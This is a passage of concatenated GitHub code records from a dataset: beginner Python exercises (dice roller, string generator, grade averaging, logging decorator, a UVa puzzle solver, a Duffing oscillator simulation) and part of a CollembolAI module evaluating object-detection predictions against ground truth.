2:\r\n liczba_2 = liczba_2 + 1\r\n elif kostka == 3:\r\n liczba_3 = liczba_3 + 1\r\n elif kostka == 4:\r\n liczba_4 = liczba_4 + 1\r\n elif kostka == 5:\r\n liczba_5 = liczba_5 + 1\r\n elif kostka == 6:\r\n liczba_6 = liczba_6 + 1 \r\n \r\n if (statystyka == 1 or statystyka == 2) and start != 1: \r\n date2 = datetime.now()\r\n czas_minuty = int((date2 - date1).total_seconds()/60)\r\n czas_sekundy = int((date2 - date1).total_seconds()%60)\r\n print(\"\"\"\r\nStatystyki:\r\n 1-%r\r\n 2-%r\r\n 3-%r\r\n 4-%r\r\n 5-%r\r\n 6-%r\"\"\" \r\n % (liczba_1,liczba_2,liczba_3,liczba_4,liczba_5,liczba_6)\r\n )\r\n print(\"Średnio wypadało oczkek = \" + str(kostka_sr / ilosc)[0:4])\r\n print(\"Czas obliczeń = \" + str(czas_minuty) + \":\" + str(czas_sekundy))\r\n\r\n\r\ndef baza(ile_razy):\r\n global statystyka, date1, ilosc\r\n date1 = datetime.now()\r\n for i in range(0,ile_razy):\r\n kostka = random.randint(min_val,max_val)\r\n ilosc = ilosc + 1\r\n statystyki(statystyka, kostka, 1)\r\n print(char[kostka-1]) \r\n print(\"Kostka wylosowała = \" + str(kostka)+\"\\n\")\r\n \r\n\r\n statystyki(statystyka, 0, 0)\r\n resecik = input(\"Jeszcze raz? y/n\\n\")\r\n if resecik == \"y\" or resecik == \"Y\" or resecik == '':\r\n if statystyka != 2:\r\n reset()\r\n print(\"Okay!\")\r\n liczba_roli()\r\n else:\r\n print(\"Bye!\")\r\n\r\nchar = [(\"\"\"\r\n -------------\r\n | |\r\n | 0 |\r\n | |\r\n -------------\r\n \"\"\"),\r\n (\"\"\"\r\n -------------\r\n | 0 |\r\n | |\r\n | 0 |\r\n -------------\r\n \"\"\"),\r\n (\"\"\"\r\n -------------\r\n | 0 |\r\n | 0 |\r\n | 0 |\r\n -------------\r\n \"\"\"),\r\n (\"\"\"\r\n -------------\r\n | 0 0 |\r\n | |\r\n | 0 0 |\r\n -------------\r\n \"\"\"), \r\n (\"\"\"\r\n -------------\r\n | 0 0 |\r\n | 0 |\r\n | 0 0 |\r\n -------------\r\n \"\"\"), \r\n (\"\"\"\r\n -------------\r\n | 0 0 |\r\n | 0 0 |\r\n | 0 0 |\r\n -------------\r\n \"\"\"), \r\n ]\r\n\r\ndef main():\r\n reset()\r\n try:\r\n global statystyka\r\n print(\"\"\"\r\n 0 - brak statystyki,\r\n 1 - statystyka miękka,\r\n 2 - statystyka twarda,\r\n \"\"\")\r\n statystyka = int(input(odstep + \"Włączyć statystykę? 2/1/0\\n\"))\r\n \r\n except:\r\n print(\"Źle coś wprowadziłeś/aś - statystyka WYŁĄCZONA\") \r\n statystyka = 0\r\n statystyki(statystyka,0,1)\r\n liczba_roli()\r\n\r\ntry:\r\n main()\r\nexcept KeyboardInterrupt:\r\n statystyki(2,0,0)\r\n print(\"XDDD\") ","repo_name":"EmsiiDiss/PythonLearning","sub_path":"Dice Roll.py","file_name":"Dice Roll.py","file_ext":"py","file_size_in_byte":4137,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34887644202","text":"# Utwórz generator instancji testowych, który wygeneruje losowe ciągi znaków składające się\n# z jedynie z cyfr od 0-9. 
Upewnij się, że conajmniej 2 takie same znaki znajdą się w sekwencji.\n# Zmodyfikuj generator tak, by oczekiwał znaków podanych przez użytkownika np.\n# użytkownik podaje 4 znaki: ‘a’, ‘b’, ‘c’, ‘*’.\n# Zaimportuj generator bezpośrednio do programu.\nimport random\n\n\ndef main():\n \"\"\"Info and Menu of script\"\"\"\n print(f'This is a random sequence generator.')\n print(f'It can generate 30 char sequence from integer numbers from 0 to 9,'\n f' or sequence of characters given by user.')\n user_choice = ''\n user_options = ['u', 'c']\n while user_choice not in user_options:\n user_choice = input(f'If You want to give Your set of characters, press \"u\", if not, press \"c\" -> ').lower()\n if user_choice == 'c':\n num_gen()\n else:\n user_gen(user_set())\n\n\ndef user_set():\n \"\"\"Collect User set of characters\"\"\"\n user_choice_count = int(input(f'How many characters do You want to input -> '))\n user_char_list = []\n n = 1\n while user_choice_count > 0:\n user_character = input(f'Type character no {n} -> ')\n user_char_list.append(user_character)\n user_choice_count -= 1\n n += 1\n return user_char_list\n\n\ndef num_gen():\n \"\"\"Generate random string of numbers from 0 to 9\"\"\"\n test_string = ''\n for i in range(30):\n test_string += str(random.randrange(0, 9, 1))\n return test_string\n\n\ndef user_gen(char_list):\n \"\"\"Generate random string of characters given by user\"\"\"\n test_string = ''\n for i in range(30):\n test_string += str(random.choice(char_list))\n return test_string\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Adam-Kolowrocki/New_beginning","sub_path":"08_modules/06_FIND_IN_STRING/test_gen.py","file_name":"test_gen.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17175027079","text":"f=open('c:/Users/User/Desktop/input.txt', 'r')\r\nelevi=list(f)\r\nprint(f'Nr Numele Prenumele Nota1 Nota2 Nota3')\r\nb=open('c:/Users/User/Desktop/rezerva.txt', 'w')\r\nc=open('c:/Users/User/Desktop/output.txt', 'w')\r\nmedia=0\r\nfor i in elevi:\r\n elev=i.split()\r\n print(f'{elev[0]} {elev[1]} {elev[2]} {elev[3]} {elev[4]} {elev[5]}')\r\n b.write(f'{elev[0]}\\t{elev[1]}\\t{elev[2]}\\t{elev[3]}\\t{elev[4]}\\t{elev[5]}\\n')\r\n media=(float(elev[3])+float(elev[4])+float(elev[5]))/3\r\n c.write(f'{elev[0]}\\t{elev[1]}\\t{elev[2]}\\t{media}\\n')\r\nc.close()\r\nwith open('c:/Users/User/Desktop/output.txt', 'r') as c:\r\n elevi2=list(c)\r\nprint(f'Nr\\tNumele\\t\\tPrenumele\\tMedia')\r\nfor i in elevi2:\r\n elev=i.split()\r\n print(f'{elev[0]}\\t{elev[1]}\\t{elev[2]}\\t{elev[3]}')\r\nb.close()\r\nf.close()","repo_name":"elenamoglan/Evaluare-sumativ--Fi-iere","sub_path":"evaluare.py","file_name":"evaluare.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73896858067","text":"'''\nCreated on Jun 18, 2013\n\n@author: Yubin Bai\n\nAll rights reserved.\n'''\n\nimport time\nfrom multiprocessing.pool import Pool\nparallelSolve = False\nINF = 1 << 30\n\n\ndef solve(par):\n W, H, N, subs = par\n board = []\n for i in range(H + 1):\n board.append(list([False] * (W + 1)))\n\n for s in subs:\n x1, y1, x2, y2 = s\n x1, x2 = min(x1, x2), max(x1, x2)\n y1, y2 = min(y1, y2), max(y1, y2)\n for i in range(y1, y2 + 1):\n for j in range(x1, x2 + 1):\n board[i][j] = True\n\n counter = 0\n for i in range(1, H + 1):\n for j in range(1, W + 1):\n if not board[i][j]:\n counter += 
1\n\n if counter == 1:\n return 'There is one empty spots.'\n elif counter == 0:\n return 'There is no empty spots.'\n else:\n return 'There are %d empty spots.' % counter\n\n\nclass Solver:\n\n def getInput(self):\n self.numOfTests = 0\n self.input = []\n while True:\n W, H, N = map(int, self.fIn.readline().split())\n if W == 0:\n break\n self.numOfTests += 1\n\n subs = []\n for i in range(N):\n subs.append(map(int, self.fIn.readline().split()))\n self.input.append((W, H, N, subs))\n self.fIn.readline()\n\n def __init__(self):\n self.fIn = open('input.txt')\n self.fOut = open('output.txt', 'w')\n self.results = []\n\n def parallel(self):\n self.getInput()\n p = Pool(4)\n millis1 = int(round(time.time() * 1000))\n self.results = p.map(solve, self.input)\n millis2 = int(round(time.time() * 1000))\n print(\"Time in milliseconds: %d \" % (millis2 - millis1))\n self.makeOutput()\n\n def sequential(self):\n self.getInput()\n millis1 = int(round(time.time() * 1000))\n for i in self.input:\n self.results.append(solve(i))\n millis2 = int(round(time.time() * 1000))\n print(\"Time in milliseconds: %d \" % (millis2 - millis1))\n self.makeOutput()\n\n def makeOutput(self):\n for test in range(self.numOfTests):\n self.fOut.write(\"%s\\n\" % self.results[test])\n self.fIn.close()\n self.fOut.close()\n\nif __name__ == '__main__':\n solver = Solver()\n if parallelSolve:\n solver.parallel()\n else:\n solver.sequential()\n","repo_name":"yubinbai/pcuva-problems","sub_path":"UVa 10703 - Free spots/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"48"} +{"seq_id":"23912710510","text":"import logging\n\n\ndef logging_decorator(fileName):\n def inner_decorator(f):\n def wrap(*args, **kwargs):\n logger = logging.getLogger('logName')\n if not logger.hasHandlers():\n hdlr = logging.FileHandler(fileName)\n hdlr.setFormatter(logging.Formatter('%(asctime)s %(levelname)s %(message)s'))\n logger.addHandler(hdlr)\n logger.setLevel(logging.INFO)\n if len(args) == len(kwargs) == 0:\n logger.info('Function {0} was called'.format(f.__name__))\n elif len(kwargs) == 0:\n logger.info('Function {0} was called with args {1}'.format(f.__name__, args))\n elif len(args) == 0:\n logger.info('Function {0} was called with kwargs {1}'.format(f.__name__,\n {x[0]: x[1] for x in kwargs.items()}))\n else:\n logger.info('Function {0} was called with args {1} and kwargs {2}'.format\n (f.__name__, args, {x[0]: x[1] for x in kwargs.items()}))\n f(*args, **kwargs)\n return wrap\n return inner_decorator\n\n\n@logging_decorator('testLog.txt')\ndef func(arg):\n print(arg)\n\n@logging_decorator('testLog.txt')\ndef awesomeFunc(arg1, arg2, arg3):\n print(arg1 + arg2 + arg3)\n\n@logging_decorator('testLog.txt')\ndef freakyFunc(**kwargs):\n for x in kwargs.values():\n print(x)\n\nif __name__ == '__main__':\n func(5)\n awesomeFunc(1, 2, 3)\n freakyFunc(b=5)","repo_name":"abelousova/python-diht-2014","sub_path":"homework06.04/LoggingDecorator.py","file_name":"LoggingDecorator.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73091241104","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport Duffing\n\n### time step, number of steps\ndt = 0.026179938779914945\nsteps = int(100e6)\ntime = np.arange(0,steps)*dt\n\n\n### initial conditions\nparticle_1 = Duffing.particle(\n position=0.5,\n velocity=0.0,\n mass=1.0,\n a=-1.0,\n 
b=1.0,\n f0=2.0,\n omega=2.4,\n gamma=0.1)\n\n### data arrays\nvelocity_1 = np.zeros(steps)\nposition_1 = np.zeros(steps)\nforce_1 = np.zeros(steps)\n\nvelocity_1[0] = particle_1.velocity\nposition_1[0] = particle_1.position\nforce_1[0] = particle_1.force\n\n### integrate\nfor i in range(1,steps):\n if i%10000 == 0 and i != 0:\n print('Step {} out of {}'.format(i,steps))\n particle_1.runge_kutta(dt)\n\n velocity_1[i] = particle_1.velocity\n position_1[i] = particle_1.position\n force_1[i] = particle_1.force\n\n#pe_1 = (-particle_1.forceparams['gamma']*velocity_1\n# +2*particle_1.forceparams['a']*position_1\n# -4*particle_1.forceparams['b']*position_1**3\n# +particle_1.forceparams['f0']*np.cos(particle_1.forceparams['omega']*time))\n\n### save the data\nperiod = 100\ndata = np.append(time.reshape(steps,1),position_1.reshape(steps,1),axis=1)\ndata = np.append(data,velocity_1.reshape(steps,1),axis=1)\nnp.savetxt('duffing.csv',data[::period,:])\n\n### plot\nfig, ax = plt.subplots()\nfig.set_size_inches(5,3,forward=True)\nfig.tight_layout(pad=2.5)\n\nax.plot(time,position_1,'k',lw=1.5) #,label=r'$x_0$=0.5')\n\n# configure the plot\nfor axis in ['top','bottom','left','right']:\n ax.spines[axis].set_linewidth(1.5)\n\n#ax.set_ylim(-3,3)\n#ax.set_xlim(-0.02,0.52)\n\nax.minorticks_on()\nax.tick_params(which='both', width=1)\nax.tick_params(which='major', length=5)\nax.tick_params(which='minor', length=3, color='k')\nax.set_xlabel('time',labelpad=4,fontweight='normal',\n fontsize='large')\nax.set_ylabel('position',labelpad=4,fontweight='normal',\n fontsize='large')\n#ax.legend(frameon=False,prop={'size':'small'},ncol=2)\nfig.suptitle('Duffing Oscillator',y=0.97)\n#plt.savefig('duffing.png',format='png',dpi=300,bbox_inches='tight')\nplt.show()\n\n","repo_name":"silentforest89/CompFizz","sub_path":"Thijssen/Mine/Chapter1/StrangeAttractor/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41654852910","text":"#!/usr/bin/env python3\n\"\"\"\nProject title: CollembolAI\nAuthors: Stephan Weißbach, Stanislav Sys, Clément Schneider\nOriginal repository: https://github.com/stasys-hub/Collembola_AI.git\nModule title: match_groundtruth.py\nPurpose: match a given result json file with the groundtruth (test.json)\nDependencies: See ReadMe\nLast Update: 18.02.2022\n\"\"\"\n\nimport pandas as pd\nfrom itertools import product\nimport json\nimport numpy as np\nimport os\n\nfrom utils.cocoutils import *\nfrom postprocess.nms import *\nfrom utils.output_inference_images import *\nfrom utils.third_party_utils import plot_confusion_matrix\nfrom sklearn.metrics import confusion_matrix, ConfusionMatrixDisplay\nimport matplotlib.pyplot as plt\n\n\ndef match_true_n_pred_box(df_ttruth, df_pred, IoU_threshold=0.4):\n \"\"\"Match the ground truth annotations with the predicted annotations based on IoU, then merge ground truth\n and prediction dataframe on shared annotation, and output the merged dataframe\"\"\"\n matched = pd.DataFrame()\n df_pred[\"id_pred\"] = df_pred[\"id\"]\n df_pred[\"pred_box\"] = df_pred[\"box\"]\n df_ttruth[\"id_true\"] = df_ttruth[\"id\"]\n df_ttruth[\"true_box\"] = df_ttruth[\"box\"]\n df_ttruth[\"true_area\"] = df_ttruth[\"area\"]\n\n for image_id in df_pred.file_name.unique():\n # subset dataframe to only have predictions of one image\n sdf_pred = df_pred[df_pred[\"file_name\"] == image_id]\n sdf_ttruth = df_ttruth[df_ttruth[\"file_name\"] == image_id]\n sdf_ttruth = 
df_ttruth[df_ttruth[\"file_name\"] == image_id]\n # create one df with all possible combinations of predicted and groundtruth boxes\n df = pd.DataFrame(\n product(sdf_ttruth[\"id\"], sdf_pred[\"id\"]), columns=[\"id_true\", \"id_pred\"]\n )\n # add information from original dataframes\n df = df.merge(\n sdf_ttruth[[\"id_true\", \"true_box\", \"true_area\"]], how=\"left\", on=\"id_true\"\n ).merge(sdf_pred[[\"id_pred\", \"pred_box\", \"score\"]], how=\"left\", on=\"id_pred\")\n # compute intersection, union and IoU\n df[\"intersection\"] = df[[\"true_box\", \"pred_box\"]].apply(\n lambda x: x[0].intersection(x[1]).area, axis=1\n )\n df[\"union\"] = df[[\"true_box\", \"pred_box\"]].apply(\n lambda x: x[0].union(x[1]).area, axis=1\n )\n\n df[\"IoU\"] = df[\"intersection\"] / df[\"union\"]\n # filter for boxes that are below IoU threshold\n df = df[df[\"IoU\"] > IoU_threshold]\n # concat\n matched = pd.concat([matched, df], axis=0)\n # keep only best (by confidence score) predictions for each bbox\n df2 = matched.sort_values(by=\"score\", ascending=False)\n df2 = df2.drop_duplicates(subset=[\"id_pred\"], keep=\"first\")\n df2 = df2.drop_duplicates(subset=[\"id_true\"], keep=\"first\")\n # add information about correctness of prediction\n pairs = (\n df_ttruth[[\"id_true\", \"name\"]]\n .merge(df2[[\"id_true\", \"id_pred\"]], how=\"left\", on=\"id_true\")\n .merge(df2[[\"id_pred\", \"score\"]], how=\"outer\", on=\"id_pred\")\n .rename(columns={\"name\": \"name_true\"})\n )\n pairs = pairs.merge(df_pred[[\"id_pred\", \"name\", \"score\"]], how=\"outer\", on=\"id_pred\").rename(\n columns={\"name\": \"name_pred\"}\n )\n pairs['score'] = pairs['score_x'].where(pairs['score_x'].notnull(), pairs['score_y'])\n pairs[\"is_correct\"] = pairs[\"name_true\"] == pairs[\"name_pred\"]\n pairs[\"is_correct_class\"] = (pairs[\"name_true\"] == pairs[\"name_pred\"]).where(\n pairs.id_pred.notnull(), np.nan\n )\n return pairs\n\ndef IoU(row):\n '''Compute the IoU of truth/pred boxes in our matching dataframe'''\n return row[0].intersection(row[1]).area / row[0].union(row[1]).area\n\ndef precision(tp: int, fp: int) -> float:\n \"\"\"\n tp: number of True Positives\n fp: number of False Positives\n \"\"\"\n # handle potental error\n if (tp + fp) == 0:\n return 0\n else:\n return tp/(tp + fp)\n\ndef recall(true_positive: int, total_possible_positives: int) -> float:\n \"\"\"\n true_positive: number of True Positives\n total_possible_positives: TP + FN\n \"\"\"\n # avoid division by 0\n if total_possible_positives == 0:\n return 0\n else:\n return true_positive/total_possible_positives\n\ndef get_status_count(df_pairs):\n \"\"\"\n Count number of TP, FP and FN from the true/pred dataframe generated by function 'process_results' and return as dataframe of outcomes per class\n \"\"\"\n cls_value_counts = pd.concat([\n df_pairs.groupby('name_true')['id_true'].count().rename('Ground truth total'),\n df_pairs[df_pairs['status'] == 'True Positive'].groupby('name_true')['id_true'].count().rename('True positive'),\n df_pairs[df_pairs['status'] == 'False positive (background)'].groupby('name_pred')['id_pred'].count().rename('False positive background'),\n df_pairs[df_pairs['status'] == 'False negative (not detected)'].groupby('name_true')['id_true'].count().rename('False negative (not detected)'),\n df_pairs[df_pairs['status'] == 'Missclassified'].groupby('name_true')['id_true'].count().rename('False negative (from missclassification)'),\n df_pairs[df_pairs['status'] == 
'Missclassified'].groupby('name_pred')['id_pred'].count().rename('False positive (from missclassification)')], axis=1).fillna(0)\n    return cls_value_counts\n\ndef get_average_precision_recall_from_cls_vc(cls_value_counts):\n    \"\"\" Return the macro average and the micro average recall and precision from the outcome dataframe (this is at a given IoU\n    and score threshold).\n    Macro-average computes the metric independently for each class and then takes the average.\n    Micro-average aggregates the contributions of all classes to compute the average metric.\n    \"\"\"\n\n    # Micro metrics\n    sum_value_counts = cls_value_counts.sum(axis=0)\n    up = precision(\n        sum_value_counts['True positive'],\n        (sum_value_counts['False positive background'] +\n         sum_value_counts['False positive (from missclassification)'])\n    )\n    ur = recall(sum_value_counts['True positive'], sum_value_counts['Ground truth total'])\n\n    # Macro metrics\n    mp = (cls_value_counts['True positive'] /\n          (cls_value_counts['True positive'] +\n           cls_value_counts['False positive background'] +\n           cls_value_counts['False positive (from missclassification)'])).sum() / cls_value_counts.shape[0]\n    mr = (cls_value_counts['True positive'] / cls_value_counts['Ground truth total']).sum() / cls_value_counts.shape[0]\n    return up, ur, mp, mr\n\ndef get_mAP_from_TruthPred_df(pairs, verbose=True):\n    \"\"\"\n    Compute the mAP, as per the Pascal VOC competition standard, over all values of Recall.\n    'pairs' is the truth/pred DF produced by function 'process_results'. Note that the mAP IoU threshold is equal to the parameter 'match_thresh'\n    passed to 'process_results'\n    \"\"\"\n\n    df_new = pairs.sort_values(\"score\", ascending=False)\n    # Remap the long status labels to short codes (TP, FN, MIS, FP)\n    remap_values_dict = {'True Positive': 'TP',\n                         'False negative (not detected)': 'FN',\n                         'Missclassified': 'MIS',\n                         'False positive (background)':'FP' }\n    df_new = df_new.replace({\"status\": remap_values_dict})\n\n    # calculate metrics per class\n    recall_per_class = []\n    precision_per_class = []\n    classs_list = []\n\n    # get class names (including nan)\n    for i in df_new[\"name_true\"].unique():\n        # subset by class\n\n        TOTAL_GROUND_TRUTH = df_new[df_new[\"name_true\"] == i].shape[0]\n\n        tmp_df = df_new[(df_new[\"name_true\"] == i) | (df_new[\"name_pred\"] == i)] # selecting all rows where class i is mentioned\n        tmp_df = tmp_df.sort_values(\"score\", ascending=True)\n\n        # get the amount of FN that never got detected (score = NaN, status = FN). 
This number is never going to change\n        # Then drop those rows.\n        always_false_negative = tmp_df[tmp_df['status'] == 'FN'].shape[0]\n        tmp_df = tmp_df[tmp_df['status'] != 'FN']\n        total_predictions = tmp_df.shape[0]\n\n        # Create objects to collect metrics per class\n        recall_list = []\n        precision_list = []\n\n        # Adding predictions one by one, from highest score to lowest\n        for idx in range(total_predictions-1, 0-1, -1):\n            subtmp_df = tmp_df.iloc[idx:total_predictions]\n            true_positive = subtmp_df[subtmp_df['status'] == 'TP'].shape[0]\n            false_positive = subtmp_df[subtmp_df['name_true'] != i].shape[0] # FP when the true name is not from class i (i.e., pred name is incorrectly from class i)\n            false_negative = subtmp_df[subtmp_df['name_pred'] != i].shape[0] # FN when the predicted name is not from class i\n            false_negative = false_negative + always_false_negative # FN are not useful for calculation, but still could be printed.\n\n            # calculate metrics, store in lists\n            recall_list.append(recall(true_positive, TOTAL_GROUND_TRUTH ))\n            precision_list.append(precision(true_positive, false_positive))\n\n        # append data for every class\n        recall_per_class.append(recall_list)\n        precision_per_class.append(precision_list)\n        classs_list.append(i)\n\n        #print(\"Species: \", i)\n        #print(\"Total Detections (TP+FP): \", true_positive+false_positive)\n        #print(\"TP: \", true_positive)\n        #print(\"FP: \", false_positive)\n        #print(\"FN: \", false_negative)\n\n    # accumulated AP for all classes\n    AP_acc = 0\n    #AP_per_class = [] # CLEM: This variable is never used ???\n\n    # perform AP calculation and plotting for every class\n    for idx, species in enumerate(classs_list):\n        # check if precision and recall have the same dims\n        if len(recall_per_class[idx]) != len(precision_per_class[idx]):\n            print(\"Dimensions of the recall and precision tables do not match!\")\n        else:\n            # transform to np arrays and prepend 0 and 1 respectively for easy recursive calculation\n            recalls = np.append(0,np.array(recall_per_class[idx]))\n            precisions = np.append(1,np.array(precision_per_class[idx]))\n\n            for i in range(0,len(precisions)):\n                precisions[i] = max(precisions[i:])\n\n            # Dropping duplicated recall values if any\n            tdf=pd.DataFrame(data={'recalls':recalls,'precisions':precisions}).drop_duplicates(subset='recalls', keep='first')\n            recalls = tdf['recalls'].values\n            precisions = tdf['precisions'].values\n\n            # calc AP per class (PASCAL VOC)\n            AP = np.sum((recalls[1:] - recalls[:-1]) * precisions[:-1])\n            if verbose:\n                print(f\"{species} AP: {AP}\")\n            AP_acc += AP\n\n    mAP = AP_acc/(len(classs_list)-1)\n    return mAP\n\ndef process_results(test_directory, train_directory, filename, nms_IoU=0.15,\n                    match_thresh=0.4, write_outputs=True, verbose=True, draw_n_plot=False, score_thresh=0.7):\n    \"\"\"\n    This block of code originally came from the CollembolAI.py script, within the \"start_evaluation_on_test\" function.\n    It parses the results from detectron2 and applies a few obvious cleaning steps to them (dropping insanely large\n    bounding boxes and removing duplicated boxes).\n    Then it compares the predicted annotations with the true annotations in order to estimate accuracy.\n    Predicted labels and True labels are matched based on an IoU criterion.\n    Its output is necessary for evaluation.\n    \"\"\"\n\n    with open(os.path.join(test_directory, filename), 'r') as j:\n        tpred = json.load(j)\n\n    print('\\n\\nLoading predictions and conducting non max suppression')\n\n    df_pred = coco2df(tpred)\n    # Dropping predictions with score below the score_threshold.\n    df_pred = df_pred[df_pred['score'] 
>= score_thresh]\n\n    if nms_IoU > 0:\n        df_pred = non_max_supression(df_pred, IoU_threshold=nms_IoU)\n\n    # Loading ground truth labels (test set)\n    with open(os.path.join(test_directory, \"test.json\"), 'r') as j:\n        ttruth = json.load(j)\n    df_ttruth = coco2df(ttruth)\n    df_ttruth['id_true'] = df_ttruth['id']\n\n    # Loading train set labels\n    with open(os.path.join(train_directory, \"train.json\"), 'r') as j:\n        train = json.load(j)\n    df_train = coco2df(train)\n    df_train['id_train'] = df_train['id']\n\n    # Reporting the abundance of each label in the train set and in the test pictures (true and predicted).\n    tt_abundances = df_train.name.value_counts().to_frame().join(df_ttruth.name.value_counts(), lsuffix='_train', rsuffix='_test')\n    tt_abundances.columns = ['Train', 'Test']\n\n\n    if verbose:\n        print('\\n\\nAbundance and area of each species in the train and test pictures (true and predicted)\\n')\n\n    tt_abundances = tt_abundances.join(df_pred.name.value_counts())\\\n            .join(df_ttruth.groupby('name').sum()['area'])\\\n            .join(df_pred.groupby('name').sum()['area'], rsuffix=\"pred\")\n    tt_abundances.columns = ['Train', 'Test True', 'Test Pred', 'Test True Area', 'Test Pred Area']\n    tt_abundances['Perc Pred True'] = tt_abundances['Test Pred Area'] / tt_abundances['Test True Area'] * 100\n    tt_abundances['Test True Contribution To Total Area'] = tt_abundances['Test True Area'] / tt_abundances['Test True Area'].sum() * 100\n    tt_abundances['Test Pred Contribution To Total Area'] = tt_abundances['Test Pred Area'] / tt_abundances['Test Pred Area'].sum() * 100\n    if verbose:\n        print(tt_abundances.to_markdown())\n    if write_outputs:\n        tmpoutdir = os.path.join(test_directory, \"species_abundance_n_area.tsv\")\n        tt_abundances.to_csv(tmpoutdir, sep='\\t')\n        if verbose:\n            print(f\"written to {tmpoutdir}\")\n\n    # Matching ground truth and predictions.\n    pairs = match_true_n_pred_box(df_ttruth, df_pred, IoU_threshold=match_thresh)\n\n    # Assigning a status to each truth/pred match: TP, Missclassified, FP (background) and FN (not detected).\n    pairs['status'] = \"True Positive\"\n    pairs['status'] = pairs['status'].where(pairs['name_true'] == pairs['name_pred'], 'Missclassified')\n    pairs['status'] = pairs['status'].where(pairs['name_true'].notnull(), 'False positive (background)')\n    pairs['status'] = pairs['status'].where(pairs['name_pred'].notnull(), 'False negative (not detected)')\n\n    # For each class (species), counting the numbers of TP, FP (background), FN (not detected),\n    # FN (stemming from missclassification), FP (stemming from missclassification).\n    cls_value_counts = get_status_count(pairs)\n\n    if write_outputs:\n        tmpoutdir = os.path.join(test_directory, \"outcome_counts_per_class.tsv\")\n        if verbose:\n            print(f'Writing the counts of TP, FP and FN to {tmpoutdir}')\n        cls_value_counts.to_csv(tmpoutdir, sep='\\t')\n\n    # Some general metrics to report in verbose mode\n    total_true_labels = pairs.id_true.notnull().sum()\n    true_labels_without_matching_preds = pairs.id_pred.isnull().sum()\n    perc_detected_animals = 100 - (true_labels_without_matching_preds / total_true_labels * 100)\n    perc_correct_class = pairs['is_correct_class'].sum() / pairs.dropna().shape[0] * 100\n\n    if verbose:\n\n        print(f'The test set represents a total of {total_true_labels} specimens.')\n        print(f'The model produced {len(tpred[\"annotations\"])} predictions, of which {df_pred.shape[0]} remain after deduplication' +\n              ' and removal of oversized bounding boxes.')\n        print(f'{total_true_labels - true_labels_without_matching_preds} 
({round(perc_detected_animals, 1)}% of the total) ' +\n              'of the actual specimens were correctly detected.' +\n              f' Of those detected specimens, {int(pairs[\"is_correct_class\"].sum())} (= {round(perc_correct_class, 1)}%) were assigned to the correct species.')\n        print(f'Of the predicted labels, {cls_value_counts[\"False positive background\"].sum()} '+\n               f'(={round(cls_value_counts[\"False positive background\"].sum() / df_pred.shape[0] * 100, 1)}%) '+\n               'were false positives (background, not related to a real specimen)')\n\n\n    # Adding outcomes to df_ttruth\n    df_ttruth = df_ttruth.merge(pairs[pairs['name_true'].notnull()][['id_true', 'score', 'name_pred', 'is_correct_class']], on='id_true')\n    df_ttruth['is_detected'] = df_ttruth['is_correct_class'].where(df_ttruth['is_correct_class'].isnull(), 1).fillna(0)\n\n    pairs = pairs.merge(df_ttruth[['id_true', 'bbox']].rename(columns={'bbox': 'bbox_true'}), on='id_true', how='outer')\\\n        .merge(df_pred[['id_pred', 'bbox']].rename(columns={'bbox': 'bbox_pred'}), on='id_pred', how='outer')\n\n    pairs['box_true'] = pairs['bbox_true'].apply(lambda x: COCObox_2_shapely(x) if isinstance(x, list) else box(0,0,0,0))\n    pairs['box_pred'] = pairs['bbox_pred'].apply(lambda x: COCObox_2_shapely(x) if isinstance(x, list) else box(0,0,0,0))\n    pairs['IoU_truth_pred'] = pairs[['box_true','box_pred']].apply(IoU, axis = 1)\n    pairs = pairs.drop(labels=['score_x', 'score_y'], axis=1)\n\n    if draw_n_plot:\n        # Drawing the predicted annotations on the pictures\n        #------------------------------------------------------------------------------------------------\n        print('\\n\\nDrawing the predicted annotations of the test pictures to support visual verification')\n        print('Do not use for testing or for training ! =)')\n\n        draw_coco_bbox(df_pred, os.path.join(test_directory), test_directory,\n                       prefix=\"predicted\", line_width=10, fontsize = 150, fontYshift = -125)\n        #------------------------------------------------------------------------------------------------\n\n        # Plotting the confusion matrices\n        #------------------------------------------------------------------------------------------------\n        # 1. CM including only the detected true labels\n\n        mcm = confusion_matrix(pairs.dropna().name_true, pairs.dropna().name_pred.fillna('NaN'), labels = pairs.dropna().name_true.unique())\n        disp = ConfusionMatrixDisplay(confusion_matrix=mcm, display_labels=pairs.dropna().name_true.unique())\n        fig, ax = plt.subplots(figsize=(10,10))\n        disp.plot(xticks_rotation='vertical', ax=ax, values_format=\"d\")\n        plt.savefig(os.path.join(test_directory, 'cm_onlydetected.svg'), format=\"svg\")\n\n        # 2. CM including only the detected true labels, normalized\n        # Note: the normalized matrix option is bugged in the plot_confusion_matrix function from sklearn\n        # Thus I normalize the matrix here before plotting and don't use the option\n        mcm = mcm.astype('float') / mcm.sum(axis=1)[:, np.newaxis] * 100\n        mcm = mcm.round(1)\n        disp = ConfusionMatrixDisplay(confusion_matrix=mcm, display_labels=pairs.dropna().name_true.unique())\n        fig, ax = plt.subplots(figsize=(10,10))\n        disp.plot(xticks_rotation='vertical', ax=ax, values_format=\".1f\")\n        plt.savefig(os.path.join(test_directory, 'cm_norm_onlydetected.svg'), format=\"svg\")\n\n        # 3. 
